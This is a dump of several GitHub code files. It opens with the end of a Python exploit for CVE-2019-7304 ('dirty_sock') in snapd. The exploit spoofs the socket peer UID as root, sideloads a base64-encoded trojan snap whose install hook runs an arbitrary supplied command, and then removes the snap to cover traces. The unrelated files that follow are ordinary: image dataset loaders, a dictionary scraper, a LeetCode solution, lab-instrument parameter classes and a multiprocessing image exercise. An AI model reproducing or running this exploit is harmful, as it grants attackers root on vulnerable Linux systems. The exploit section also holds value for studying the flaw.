'''BQQpuYW1lOiBkaXJ0eS1zb2NrCnZlcnNpb246ICcwLjEnCnN1bW1hcnk6IEVt\ncHR5IHNuYXAsIHVzZWQgZm9yIGV4cGxvaXQKZGVzY3JpcHRpb246ICdTZWUgaHR0cHM6Ly9naXRo\ndWIuY29tL2luaXRzdHJpbmcvZGlydHlfc29jawoKICAnCmFyY2hpdGVjdHVyZXM6Ci0gYW1kNjQK\nY29uZmluZW1lbnQ6IGRldm1vZGUKZ3JhZGU6IGRldmVsCviACQD9AQAAAACX5/ZcAwAAAAAAAAAA\nAAAAIgQAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAP////8BAP0BAAAAAO3k9lwCAAAAAAAAAAIA\nAAAeAAAAAQAAAAIAtAEAAAAA+Ln1XAQAAAAAAAAAAAAAACIEAAC/AAAAAQD9AQAAAAD4ufVcAQAA\nAAAAAAADAAAALQAbAAcAAAABAP0BAAAAAPnk9lwGAAAAAAAAAAIAAAAeAEUABQAAAAEA/QEAAAAA\n+Ln1XAUAAAAAAAAAAwAAABwAYAAHAAAAAQD9AQAAAAD4ufVcBwAAAAAAAAAEAAAAJwB5AAgAAACd\ngAAAAAAAAAAAAwAAAAAAAAACAAYAaW5zdGFsbAEAAAAAAAAAAgAAADgAAAABAAQAaG9va3NYAAIA\nAgAIAHNuYXAueWFtbAAAAAAAAAAAAwAAAAAAAAACAAYAaW5zdGFsbAAAAAAAAAAABgAAAJgAAAAB\nAAQAaG9va3MBAAAAAAAAAAEAAAB4AAAAAQADAG1ldGG4AAQAAQADAHNuYXAQgGAAAAAAAAAA4QQA\nAQAAAADaBgAAAAAAADiAeAAAAAAAAAA4AAAAAAAAAAAAAAAAAAAAWAAAAAAAAAC4AAAAAAAAAJgA\nAAAAAAAA2AAAAAAAAAD0BgAAAAAAAASA6AMAADYH'''+'A'*2990 + '==')\n\ndef check_args():\n \"\"\"Return short help if any args given\"\"\"\n if len(sys.argv) > 1:\n print(\"\\n\\n\"\n \"No arguments needed for this version. Simply run and enjoy.\"\n \"\\n\\n\")\n sys.exit()\n\ndef create_sockfile():\n \"\"\"Generates a random socket file name to use\"\"\"\n alphabet = string.ascii_lowercase\n random_string = ''.join(random.choice(alphabet) for i in range(10))\n dirty_sock = ';uid=0;'\n\n # This is where we slip on the dirty sock. This makes its way into the\n # UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion\n # by snapd's ucrednet.go file, allowing us to overwrite the UID variable.\n sockfile = '/tmp/' + random_string + dirty_sock\n\n print(\"[+] Slipped dirty sock on random socket file: \" + sockfile)\n\n return sockfile\n\ndef bind_sock(sockfile):\n \"\"\"Binds to a local file\"\"\"\n # This exploit only works if we also BIND to the socket after creating\n # it, as we need to inject the dirty sock as a remote peer in the\n # socket's ancillary data.\n print(\"[+] Binding to socket file...\")\n client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n client_sock.bind(sockfile)\n\n # Connect to the snap daemon\n print(\"[+] Connecting to snapd API...\")\n client_sock.connect('/run/snapd.socket')\n\n return client_sock\n\ndef delete_snap(client_sock):\n \"\"\"Deletes the trojan snap, if installed\"\"\"\n post_payload = ('{\"action\": \"remove\",'\n ' \"snaps\": [\"dirty-sock\"]}')\n http_req = ('POST /v2/snaps HTTP/1.1\\r\\n'\n 'Host: localhost\\r\\n'\n 'Content-Type: application/json\\r\\n'\n 'Content-Length: ' + str(len(post_payload)) + '\\r\\n\\r\\n'\n + post_payload)\n\n # Send our payload to the snap API\n print(\"[+] Deleting trojan snap (and sleeping 5 seconds)...\")\n client_sock.sendall(http_req.encode(\"utf-8\"))\n\n # Receive the data and extract the JSON\n http_reply = client_sock.recv(8192).decode(\"utf-8\")\n\n # Exit on probably-not-vulnerable\n if '\"status\":\"Unauthorized\"' in http_reply:\n print(\"[!] System may not be vulnerable, here is the API reply:\\n\\n\")\n print(http_reply)\n sys.exit()\n\n # Exit on failure\n if 'status-code\":202' not in http_reply:\n print(\"[!] 
Did not work, here is the API reply:\\n\\n\")\n print(http_reply)\n sys.exit()\n\n # We sleep to allow the API command to complete, otherwise the install\n # may fail.\n time.sleep(5)\n\ndef install_snap(client_sock):\n \"\"\"Sideloads the trojan snap\"\"\"\n\n # Decode the base64 from above back into bytes\n blob = base64.b64decode(TROJAN_SNAP)\n\n # Configure the multi-part form upload boundary here:\n boundary = '------------------------f8c156143a1caf97'\n\n # Construct the POST payload for the /v2/snap API, per the instructions\n # here: https://github.com/snapcore/snapd/wiki/REST-API\n # This follows the 'sideloading' process.\n post_payload = '''\n--------------------------f8c156143a1caf97\nContent-Disposition: form-data; name=\"devmode\"\n\ntrue\n--------------------------f8c156143a1caf97\nContent-Disposition: form-data; name=\"snap\"; filename=\"snap.snap\"\nContent-Type: application/octet-stream\n\n''' + blob.decode('latin-1') + '''\n--------------------------f8c156143a1caf97--'''\n\n\n # Multi-part forum uploads are weird. First, we post the headers\n # and wait for an HTTP 100 reply. THEN we can send the payload.\n http_req1 = ('POST /v2/snaps HTTP/1.1\\r\\n'\n 'Host: localhost\\r\\n'\n 'Content-Type: multipart/form-data; boundary='\n + boundary + '\\r\\n'\n 'Expect: 100-continue\\r\\n'\n 'Content-Length: ' + str(len(post_payload)) + '\\r\\n\\r\\n')\n\n # Send the headers to the snap API\n print(\"[+] Installing the trojan snap (and sleeping 8 seconds)...\")\n client_sock.sendall(http_req1.encode(\"utf-8\"))\n\n # Receive the initial HTTP/1.1 100 Continue reply\n http_reply = client_sock.recv(8192).decode(\"utf-8\")\n\n if 'HTTP/1.1 100 Continue' not in http_reply:\n print(\"[!] Error starting POST conversation, here is the reply:\\n\\n\")\n print(http_reply)\n sys.exit()\n\n # Now we can send the payload\n http_req2 = post_payload\n client_sock.sendall(http_req2.encode(\"latin-1\"))\n\n # Receive the data and extract the JSON\n http_reply = client_sock.recv(8192).decode(\"utf-8\")\n\n # Exit on failure\n if 'status-code\":202' not in http_reply:\n print(\"[!] Did not work, here is the API reply:\\n\\n\")\n print(http_reply)\n sys.exit()\n\n # Sleep to allow time for the snap to install correctly. Otherwise,\n # The uninstall that follows will fail, leaving unnecessary traces\n # on the machine.\n time.sleep(8)\n\ndef print_success():\n \"\"\"Prints a success message if we've made it this far\"\"\"\n print(\"[!] 
Command Executed Successfully \\n\\n\")\n    \n\n\ndef main():\n    \"\"\"Main program function\"\"\"\n\n    # Create a random name for the dirty socket file\n    sockfile = create_sockfile()\n\n    # Bind the dirty socket to the snapdapi\n    client_sock = bind_sock(sockfile)\n\n    # Delete trojan snap, in case there was a previous install attempt\n    delete_snap(client_sock)\n\n    # Install the trojan snap, which has an install hook that creates a user\n    install_snap(client_sock)\n\n    # Delete the trojan snap\n    delete_snap(client_sock)\n\n    # Remove the dirty socket file\n    os.remove(sockfile)\n\n    # Congratulate the lucky hacker\n    print_success()\n\ndef exploit(command):\n\n    global TROJAN_SNAP\n    command = command + ' #'\n    index = 108 + len(command)\n    # decode the base64 payload to bytes and splice the command in\n    # (Python 3: work on bytes, since str has no .decode('base64'))\n    decoded = base64.b64decode(TROJAN_BASE_SNAP)\n    patched = b\"\".join((decoded[:108], command.encode('latin-1'), decoded[index:]))\n    TROJAN_SNAP = base64.b64encode(patched)\n\nif __name__ == '__main__':\n\n    if len(sys.argv) < 2:\n        print('Usage: ./exploit.py \"touch /root/POC\"')\n    \n    else:\n        exploit(sys.argv[1])\n        main()\n","repo_name":"Dhayalanb/Snapd-V2","sub_path":"CVE-2019-7304.py","file_name":"CVE-2019-7304.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"}
{"seq_id":"32262764845","text":"from skimage import io, transform, color\nfrom PIL import Image, ImageOps\nimport numpy as np\nimport torch\nfrom torch.utils import data\nfrom torchvision import transforms, utils\nimport os\nimport math\n\nclass OrganoidDataset(data.Dataset):\n    'dataset class for microwell organoid images'\n    def __init__(self, path2files, experiments, image_names, Y, intensity_mean, intensity_var):\n        assert len(image_names) == len(Y)\n        assert len(experiments) == len(image_names)\n        self.path = path2files\n        self.experiments = experiments\n        self.image_names = image_names\n        self.Y = Y\n        self.intensity_mean = intensity_mean\n        self.intensity_var = intensity_var\n    def __len__(self):\n        return len(self.Y)\n    def getXimage(self, index):\n        img_name = self.image_names[index]\n        experiment = self.experiments[index]\n        img_loc = 'well_' + str(experiment) + '/' + img_name\n        img_loc = os.path.join(self.path, img_loc)\n        image = io.imread(img_loc)\n        image = np.true_divide(color.rgb2gray(image) - self.intensity_mean, math.sqrt(self.intensity_var))\n        image = np.reshape(image, newshape = (1, image.shape[0], image.shape[1])) \n        return torch.from_numpy(image).float()\n#    def getXimage(self, index):\n#        img_name = 'well' + str(self.well_labels[index]) + '_day' + str(self.day_label_X[index]) + '_well.png'\n#        img_loc = os.path.join(self.path, img_name)\n        # skimage.io.imread returns a numpy array\n#        image = io.imread(img_loc)\n        # convert to grey scale\n#        image = np.true_divide(color.rgb2gray(image) - self.mean, self.sd)\n        # add color axis because torch image: CxHxW\n#        image = np.reshape(image, newshape = (1, image.shape[0], image.shape[1]))\n#        return torch.from_numpy(image).float()\n    def getY(self, index):\n        Y = self.Y[index]\n        return torch.from_numpy(np.asarray(self.Y[index], dtype=float)).float()\n    def __getitem__(self, index):\n        X = self.getXimage(index)\n        y = self.getY(index)\n        return X, y\n\nclass OrganoidMwAreaDataset(data.Dataset):\n    'dataset class for microwell area organoid images'\n    def __init__(self, path2files, well_labels, day_label_X,\n                 Y, intensity_mean = 0.5, intensity_var = 0.025,\n                 max_dim = 132):\n        assert len(well_labels) == len(Y)\n        assert len(day_label_X) == len(Y)\n        self.path = path2files\n        #self.mw_labels = microwell_labels\n        self.well_labels = well_labels\n        self.day_label_X = day_label_X\n        self.Y = Y\n        self.mean = intensity_mean\n        self.sd = math.sqrt(intensity_var)\n        self.max_dim = max_dim\n    def __len__(self):\n        return len(self.Y)\n    def getAreaImage(self, index):\n        img_name = 'well' + str(self.well_labels[index]) + '_day' + str(self.day_label_X[index]) + '_mw_area.png'\n        img_loc = os.path.join(self.path, img_name)\n        # skimage.io.imread returns a numpy array\n        image = io.imread(img_loc)\n        # convert to grey scale\n        image = np.true_divide(color.rgb2gray(image) - self.mean, self.sd)\n        larger_image = np.zeros((self.max_dim, self.max_dim))\n        larger_image = np.pad(image, pad_width = ((0, self.max_dim - image.shape[0]), (0, self.max_dim - image.shape[1])), mode = 'constant', constant_values = 0.0)\n        # resize and add color axis because torch image: CxHxW\n        larger_image = np.reshape(larger_image, newshape = (1, self.max_dim, self.max_dim))\n        # does it matter how the resizing is done? I don't think so\n        return torch.from_numpy(larger_image).float()\n    def getY(self, index):\n        Y = self.Y[index]\n        return torch.from_numpy(np.asarray(self.Y[index], dtype=float)).float()\n    def __getitem__(self, index):\n        X = self.getAreaImage(index)\n        y = self.getY(index)\n        return X, y\n\n\n\nclass OrganoidMultipleDataset(data.Dataset):\n    'dataset class for microwell organoid images'\n    def __init__(self, path2files, image_names, Y, mean_sd_dict):\n        for k, image_name in image_names.items():\n            assert len(image_name) == len(Y)\n        self.path = path2files\n        self.image_names = image_names\n        self.Y = Y\n        self.mean_sd_dict = mean_sd_dict\n    def __len__(self):\n        return len(self.Y)\n    def getXimage(self, index):\n        all_images_list = []\n        for day,img_names in self.image_names.items():\n            #print(day, \" \", index)\n            \n            img_name = img_names[index]\n            img_loc = os.path.join(self.path, img_name)\n            image = io.imread(img_loc)\n            mean, sd = self.mean_sd_dict[day]\n            image = np.true_divide(color.rgb2gray(image) - mean, sd)\n            all_images_list.append(image)\n        images = np.array(all_images_list)\n        return torch.from_numpy(images).float()\n    def getY(self, index):\n        Y = self.Y[index]\n        return torch.from_numpy(np.asarray(self.Y[index], dtype=float)).float()\n    def __getitem__(self, index):\n        X = self.getXimage(index)\n        y = self.getY(index)\n        return X, y\n\n\n","repo_name":"timydaley/OrganoidNet","sub_path":"models/dataLoader.py","file_name":"dataLoader.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
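The dataset classes above all standardize pixel intensities as (x - mean) / sqrt(var) before handing tensors to the model. In miniature, with the default statistics from `OrganoidMwAreaDataset` and a random stand-in image (my sketch, not the repository's code):

```python
import math
import numpy as np

intensity_mean, intensity_var = 0.5, 0.025   # the defaults used above
img = np.random.rand(4, 4)                   # stand-in for a grayscale image
normalized = np.true_divide(img - intensity_mean, math.sqrt(intensity_var))
print(normalized.mean(), normalized.std())   # roughly centered and rescaled
```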
{"seq_id":"20822259476","text":"\n# coding: utf-8\n\n# In[ ]:\n\nimport requests\nimport os\nimport re\nfrom pyquery import PyQuery as pq\n\ndef get_data(url):\n    res = requests.get(url)\n    #from pyquery import PyQuery as pq\n    doc = pq(res.content)\n    return doc\n\ndef content_write(content,filename):\n    # write the text to a file\n    with open(filename,\"w\",encoding='utf-8') as f:\n        for i in range (len(content)): \n            f.write(content[i])\n            f.write('\\n')\n        f.close()\n    \ndef pic_write(content,filename):\n    # write the image src to a txt file\n    file = open(filename,'w+') \n    file.write(content)\n    file.close()\n    \ndef mkdir(new_path):\n    # new_path=path+title[j]\n    if not os.path.exists(new_path): \n        try:\n            os.mkdir(new_path)\n        except FileNotFoundError:\n            pass\n\n\n# In[ ]:\n\nroot='http://www.guoxuedashi.com'\nkangxi='/kangxi'\ndoc=get_data(root+kangxi)\nurl=[pq(sq).attr('href') for sq in doc('.table2 td a')]\ntitle=[pq(st).text() for st in doc('.table2 td a')]\nfor h in range(len(url)):\n    path = \"F:\\\\kangxi_dictionary\\\\\"\n    new_path=path+title[h]\n    mkdir(new_path)\n    urll=root+url[h]\n    doc=get_data(urll)\n    url1=[pq(sq).attr('href') for sq in doc('.info_txt2.clearfix a')]\n    title1=[pq(st).text() for st in doc('.info_txt2.clearfix a')]\n    for j in range(len(url1)):\n        new_path1=new_path+\"\\\\\"+title1[j]\n        mkdir(new_path1)\n        url2=root+url1[j]\n        docc=get_data(url2)\n        text_name=title1[j]\n        try:\n            pic_src=docc('.info_txt2.clearfix img').attr('src')\n            a=docc('.info_txt2.clearfix p').text()\n            if(a==None):\n                continue\n            else:\n                b=a.split('\\n')\n                filename_pic=new_path1+\"\\\\\"+text_name+'_picsource.txt'\n                filename_text=new_path1+\"\\\\\"+text_name+'_text.txt'\n                pic_write(pic_src,filename_pic)\n                content_write(b,filename_text)\n            \n        except AttributeError:\n            continue\n    \n","repo_name":"wangxiya123/WangXiya_Advanced-Python_Homework","sub_path":"小组项目/康熙字典爬虫.py","file_name":"康熙字典爬虫.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} {"seq_id":"40581727186","text":"\"\"\"\n\n1576. Replace All ?'s to Avoid Consecutive Repeating Characters\n\nGiven a string s containing only lower case English letters and the '?' character, convert all the '?' characters into lower case letters such that the final string does not contain any consecutive repeating characters. You cannot modify the non '?' characters.\n\nIt is guaranteed that there are no consecutive repeating characters in the given string except for '?'.\n\nReturn the final string after all the conversions (possibly zero) have been made. If there is more than one solution, return any of them. It can be shown that an answer is always possible with the given constraints.\n\n \n\nExample 1:\n\nInput: s = \"?zs\"\nOutput: \"azs\"\nExplanation: There are 25 solutions for this problem. From \"azs\" to \"yzs\", all are valid. Only \"z\" is an invalid modification as the string will consist of consecutive repeating characters in \"zzs\".\nExample 2:\n\nInput: s = \"ubv?w\"\nOutput: \"ubvaw\"\nExplanation: There are 24 solutions for this problem. 
Only \"v\" and \"w\" are invalid modifications as the strings will consist of consecutive repeating characters in \"ubvvw\" and \"ubvww\".\nExample 3:\n\nInput: s = \"j?qg??b\"\nOutput: \"jaqgacb\"\nExample 4:\n\nInput: s = \"??yw?ipkj?\"\nOutput: \"acywaipkja\"\n \n\nConstraints:\n\n1 <= s.length <= 100\n\ns contains only lower case English letters and '?'.\n\n\"\"\"\n\nclass Solution(object):\n def modifyString(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n def generate(num, start, end):\n for i in range(ord('a'), ord('z')+1):\n if (str(chr(i)) != start and str(chr(i)) != end):\n if (num == 1):\n return chr(i), True\n subStr, retVal = generate(num-1, chr(i), end)\n if (retVal == True):\n return chr(i) + subStr , True\n return \"\" ,False\n count = 0\n before, after = \"\", \"\"\n Ans = \"\"\n for ch in s:\n if (ch != \"?\"):\n if (count > 0):\n after = ch\n gen, _ = generate(count, before, after)\n Ans += before + gen \n after = \"\"\n before = \"\"\n count = 0\n if (before != \"\"):\n Ans += before\n before = ch\n elif (ch == \"?\"):\n count += 1\n if (before != \"\"):\n Ans += before\n if (count > 0):\n gen,_ = generate(count, before, \"\")\n Ans += gen\n \n return Ans\n \n \n ","repo_name":"venkatsvpr/Problems_Solved","sub_path":"LC_Replace_All_?_To_Avoid_Consecutive_Repeating_Characters.py","file_name":"LC_Replace_All_?_To_Avoid_Consecutive_Repeating_Characters.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"42406749558","text":"# this is lukyi testing git.\nimport qcodes as qc\nimport numpy as np\nimport time\nclass setparam_meta(qc.Parameter):\n def __init__(self, name, label, scale_param, instrument, maxVal, unit, inter_delay, step):\n super().__init__(name = name, unit=unit)\n self.label = label\n self._scale_param = float(scale_param)\n self._instrument_channel = instrument\n self._maxVal = float(maxVal)\n self.step = step\n self.inter_delay=inter_delay\n self.metadata = instrument.full_name\n #self.add_parameter('voltage', get_cmd=self.getx, set_cmd=self.setx)\n\n def get_raw(self):\n raw_getval = self._instrument_channel.get()\n if type(raw_getval) == tuple: # Dirty fix for instrument parameters that return tuples\n raw_getval = raw_getval[0]\n getval = raw_getval * self._scale_param\n return getval\n \n def set_raw(self, setval):\n if abs(setval) > self._maxVal:\n raise Exception(\"Error: Set value is limited to {:e}\".format(self._maxVal))\n else:\n raw_setval = setval / self._scale_param\n self._instrument_channel.set(raw_setval)\n\nclass getparam_meta(qc.Parameter):\n def __init__(self, name, label, scale_param, instrument, unit):\n super().__init__(name = name, unit=unit)\n self.label = label\n self._scale_param = float(scale_param)\n self._instrument_channel = instrument\n self.metadata = instrument.full_name\n\n def get_raw(self):\n raw_getval = self._instrument_channel.get()\n if type(raw_getval) == tuple: # Dirty fix for instrument parameters that return tuples\n raw_getval = raw_getval[0]\n getval = raw_getval * self._scale_param\n return getval\n\n# Define a class for reading out the lockin (read X,Y and convert to R and G) for voltage bias measurement\n# dI/dV\n# Returns the resistance (R), conductance (G), X, Y lockin values, AC current \nclass diff_R_G_Vbias(qc.MultiParameter):\n def __init__(self, \n lockin_handle, \n V_div, \n IV_gain, \n V_ac=None, \n trans_gain=1,\n suffix='', \n autosense=False, \n ntc=3, \n lim=1e-6):\n 
super().__init__(name='diff_resistance'+suffix,\n names=('R'+suffix, 'G'+suffix, 'X'+suffix, 'Y'+suffix, 'I_ac'+suffix),\n shapes=((), (), (), (), ()),\n labels=('Differential resistance'+suffix, 'Differential conductance'+suffix, 'Raw voltage X'+suffix, 'Raw voltage Y'+suffix, 'I_ac'+suffix),\n units=(r'$\\Omega$', r'e$^2$/h', 'V', 'V', 'A'),\n setpoints=((), (), (), (), ()),\n docstring='Differential resistance and conductance from current -IVconv> voltage measurement')\n self._IV_gain = IV_gain\n self._V_div = V_div\n self._lockin_handle = lockin_handle\n self._autosense = autosense\n self._V_ac = V_ac\n if self._V_ac is not None:\n self._lockin_handle.amplitude.set(self._V_ac)\n self._ntc = ntc\n self._lim = lim\n self._trans_gain = trans_gain\n \n def get_raw(self):\n if self._autosense:\n auto_sensitivity(self._lockin_handle, self._ntc, self._lim)\n voltageX,voltageY=np.float64(self._lockin_handle.snap('x','y'))\n self._V_ac = np.float64(self._lockin_handle.amplitude.get())\n # some constants\n const_e = 1.60217662e-19\n const_h = 6.62607004e-34\n I_ac = voltageX/self._IV_gain\n diff_resistance = (self._V_ac*self._trans_gain/self._V_div )/ I_ac\n diff_conductance = 1/diff_resistance / const_e**2 * const_h \n return (diff_resistance, diff_conductance, voltageX, voltageY, I_ac)\n\n# Define a class for reading out the lockin (X,Y at the same time and convert to R and G)\n# dV/dI\n# Returns the resistance (R), conductance (G), X and Y lockin values\nclass diff_R_G_Ibias(qc.MultiParameter):\n def __init__(self, \n lockin_handle, \n R_pre, \n V_gain, \n V_ac=None, \n trans_gain=1,\n suffix='', \n autosense=False, \n ntc=3, \n lim=1e-6):\n super().__init__(name='diff_resistance'+suffix,\n names=('R'+suffix, 'G'+suffix, 'X'+suffix, 'Y'+suffix),\n shapes=((), (), (), ()),\n labels=('Differential resistance'+suffix, 'Differential conductance'+suffix,'Raw voltage X'+suffix, 'Raw voltage Y'+suffix),\n units=(r'$\\Omega$', r'e$^2$/h', 'V', 'V'),\n setpoints=((), (), (), ()),\n docstring='Differential resistance and conductance converted from raw voltage measurement')\n self._R_pre = R_pre\n self._V_gain = V_gain\n self._lockin_handle = lockin_handle\n self._autosense = autosense\n self._V_ac = V_ac\n if self._V_ac is not None:\n self._lockin_handle.amplitude.set(self._V_ac)\n self._ntc = ntc\n self._lim = lim\n self._trans_gain = trans_gain\n \n def get_raw(self):\n if self._autosense:\n auto_sensitivity(self._lockin_handle, self._ntc, self._lim)\n voltageX,voltageY=np.float64(self._lockin_handle.snap('x','y'))\n self._V_ac = np.float64(self._lockin_handle.amplitude.get())\n # some constants\n const_e = 1.60217662e-19\n const_h = 6.62607004e-34 \n diff_resistance = (voltageX/self._V_gain)/(self._V_ac*self._trans_gain/(self._R_pre))\n diff_conductance = 1/diff_resistance / const_e**2 * const_h\n return (diff_resistance, diff_conductance, voltageX, voltageY)\n\ndef auto_sensitivity(self, ntc, lim):\n sens = self.sensitivity.get()\n X_val = self.X.get()\n tc = self.time_constant()\n while np.abs(X_val) <= 0.2*sens or np.abs(X_val) >= 0.9*sens:\n if np.abs(X_val) <= 0.2*sens:\n if sens == lim:\n break\n self._change_sensitivity(-1)\n time.sleep(ntc*tc) #Wait to read the correct value\n else:\n self._change_sensitivity(1)\n time.sleep(ntc*tc)\n sens = self.sensitivity.get()\n X_val = self.X.get() \n# Multigate parameter class\n\nclass multi_instrument_set(qc.Parameter):\n def __init__(self, \n name, \n label, \n scale_param, \n instrument, \n slope, \n offset, \n maxVal, \n unit, \n inter_delay, \n 
step,\n                 step_meta = 1e-3, \n                 inter_delay_meta = 1e-5):\n        super().__init__(name = name, unit=unit)\n        self.label = label\n        self._scale_param = np.array(scale_param, dtype=float)\n        self._instrument_channel = np.array(instrument)\n        self._step_meta = step_meta ###actual step size of meta, set to \"None\" if you want the instrument to sweep separately\n        self.step=None ###step size for first use or after exceeding maxVal\n        self.inter_delay=inter_delay_meta\n        self._slope = np.array(slope, dtype=float)\n        self._offset = np.array(offset, dtype=float)\n        self._maxVal = np.array(maxVal, dtype=float)\n        self._length = len(self._instrument_channel)\n        self._once = False\n        for k in range(self._length): ###step size and inter delay for each instrument\n            instrument[k].step = step[k]\n            instrument[k].inter_delay = inter_delay[k]\n\n    def get_raw(self):\n        return 0\n    \n    def set_raw(self, setval):\n        ### Initialisation for first run after definition, so that gates are swept separately\n        if (self._once == False):\n            self._once = True\n            self.step =self._step_meta\n        \n        ### Calculate the values to set for all instruments\n        raw_setval = np.divide((self._slope*setval+self._offset),self._scale_param)\n\n        ### Check maxVal and then set\n        can_set = True\n        for k in range(self._length):\n            if abs(raw_setval[k]) > self._maxVal[k]:\n                can_set = False\n                break\n        if can_set == False:\n            self._once = False\n            raise Exception(\"Error: One of the set values is limited\")\n        else: \n            for k in range(self._length):\n                self._instrument_channel[k].set(raw_setval[k])\n\nclass multi_instrument_get(qc.MultiParameter):\n    def __init__(self, name, names, labels, scale_param, instrument, units):\n        super().__init__(name=name, names = names, units = units, labels = labels, shapes = ( (),)*len(instrument), setpoints =( (),)*len(instrument) ) \n        #self.names = names\n        #self.label = label\n        self._scale_param = np.array(scale_param, dtype=float)\n        self._instrument_channel = instrument\n        self._length = len(self._instrument_channel)\n    \n    def get_raw(self):\n        get_val = np.zeros(self._length)\n        for k in range(self._length):\n            get_val[k] = self._instrument_channel[k].get() * self._scale_param[k]\n        return get_val","repo_name":"KnightForest/QCTools","sub_path":"qctools/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":9354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
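`diff_R_G_Vbias`/`diff_R_G_Ibias` above convert a measured differential resistance into conductance in units of e²/h via G = (1/R) · h/e². Isolated as a helper (constants copied from the record; the function name is mine):

```python
CONST_E = 1.60217662e-19  # elementary charge [C]
CONST_H = 6.62607004e-34  # Planck constant [J*s]

def conductance_quanta(resistance_ohm: float) -> float:
    """Differential conductance in units of e^2/h for a given resistance."""
    return (1.0 / resistance_ohm) / CONST_E**2 * CONST_H

print(conductance_quanta(25812.8))  # ~1.0: the resistance quantum h/e^2
```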
{"seq_id":"13781278725","text":"'''\nRequirements\n1. Finish the team06 assignment (if necessary).\n2. Change your program to process all 300 images using 1 CPU, then 2 CPUs, all the way up to the\n    number of CPUs on your computer plus 4.\n3. Keep track of the time it takes to process all 300 images per CPU.\n4. Plot the time to process vs the number of CPUs.\n    \nQuestions:\n1. What is the relationship between the time to process versus the number of CPUs?\n    Does there appear to be an asymptote? If so, what do you think the asymptote is?\n    > The graph is an exponential decay function, so as the number of CPUs increases the time to process drastically decreases.\n    > There appears to be a horizontal asymptote to me, which is about y = 12 seconds.\n2. Is this a CPU bound or IO bound problem? Why?\n    > This is a CPU bound problem; there is no input or output to deal with.\n    > The computer is strictly processing images and only relies on the CPU.\n3. Would threads work on this assignment? Why or why not? (guess if you need to) \n    > I don't think threads would really help on this assignment because this is a CPU bound problem,\n    > and threads only improve performance in I/O bound problems.\n4. When you run \"create_final_video.py\", does it produce a video with the elephants\n    inside of the screen?\n    > Yes.\n'''\n\nfrom matplotlib.pylab import plt # load plot library\nfrom PIL import Image\nimport numpy as np\nimport timeit\nimport multiprocessing as mp\n\n# 4 more than the number of CPUs on your computer\nCPU_COUNT = mp.cpu_count() + 4\n\n# TODO Your final video need to have 300 processed frames. However, while you are\n# testing your code, set this much lower\nFRAME_COUNT = 300\n\nRED = 0\nGREEN = 1\nBLUE = 2\n\n\ndef create_new_frame(image_file, green_file, process_file):\n    \"\"\" Creates a new image file from image_file and green_file \"\"\"\n\n    # this print() statement is there to help see which frame is being processed\n    print(f'{process_file[-7:-4]}', end=',', flush=True)\n\n    image_img = Image.open(image_file)\n    green_img = Image.open(green_file)\n\n    # Make Numpy array\n    np_img = np.array(green_img)\n\n    # Mask pixels\n    mask = (np_img[:, :, BLUE] < 120) & (\n        np_img[:, :, GREEN] > 120) & (np_img[:, :, RED] < 120)\n\n    # Create mask image\n    mask_img = Image.fromarray((mask*255).astype(np.uint8))\n\n    image_new = Image.composite(image_img, green_img, mask_img)\n    image_new.save(process_file)\n\n\n# process_frames is the worker passed to Pool.map: it resolves the file names for\n# one frame number and hands them to create_new_frame to build the composited image.\ndef process_frames(image_number):\n    image_file = rf'elephant/image{image_number:03d}.png'\n    green_file = rf'green/image{image_number:03d}.png'\n    process_file = rf'processed/image{image_number:03d}.png'\n\n    create_new_frame(image_file, green_file, process_file)\n\n\nif __name__ == '__main__':\n    all_process_time = timeit.default_timer()\n\n    # Use two lists: one to track the number of CPUs and the other to track\n    # the time it takes to process the images given this number of CPUs.\n    xaxis_cpus = []\n    yaxis_times = []\n\n    # List of integers for the number of each frame we need to process.\n    inputs = list(range(1, FRAME_COUNT + 1))\n\n    # For loop that will start 1 cpu, then 2 cpus, and go all the way to CPU_COUNT (which is the number of cpus on the machine plus 4).\n    for count in range(1, CPU_COUNT + 1):\n        # Starts a timer for this iteration.\n        start_time = timeit.default_timer()\n\n        # Starts the processing pool and calls the map function to process each frame.\n        with mp.Pool(count) as p:\n            p.map(process_frames, inputs)\n\n        # Prints the number of CPU cores used and the time taken to process all images.\n        print(f'\\n\\nProcessed with {count} CPU cores.')\n        time_taken = timeit.default_timer() - start_time\n        print(\n            f'Time To Process all images = {time_taken} seconds')\n\n        # Appending the data to the lists for the graph.\n        xaxis_cpus.append(count)\n        yaxis_times.append(time_taken)\n\n    print(\n        f'Total Time for ALL processing: {timeit.default_timer() - all_process_time} seconds')\n\n    # create plot of results and also save it to a PNG file\n    plt.plot(xaxis_cpus, yaxis_times, label=f'{FRAME_COUNT}')\n\n    plt.title('Time to Process vs Number of CPUs')\n    plt.xlabel('CPU Cores')\n    plt.ylabel('Seconds')\n    plt.legend(loc='best')\n\n    plt.tight_layout()\n    plt.savefig(f'Plot for {FRAME_COUNT} frames.png')\n    
plt.show()\n","repo_name":"markvagil/cse251w23","sub_path":"week06/assignment/assignment06.py","file_name":"assignment06.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40809502876","text":"import os\nimport refinery\nimport tkinter as tk\n\nfrom traceback import format_exc\n\nfrom binilla.widgets.binilla_widget import BinillaWidget\n\nfrom refinery import editor_constants as e_c\nfrom refinery import crc_functions\n\n\nclass RefineryChecksumEditorWindow(tk.Toplevel, BinillaWidget):\n active_map = None\n validating = False\n\n def __init__(self, *args, **kwargs):\n self.active_map = kwargs.pop('active_map', None)\n BinillaWidget.__init__(self, *args, **kwargs)\n tk.Toplevel.__init__(self, *args, **kwargs)\n\n try:\n self.iconbitmap(e_c.REFINERY_ICON_PATH)\n except Exception:\n if not e_c.IS_LNX:\n print(\"Could not load window icon.\")\n\n self.geometry(\"300x80\")\n self.title(\"Change map checksum\")\n self.resizable(0, 0)\n\n self.cs 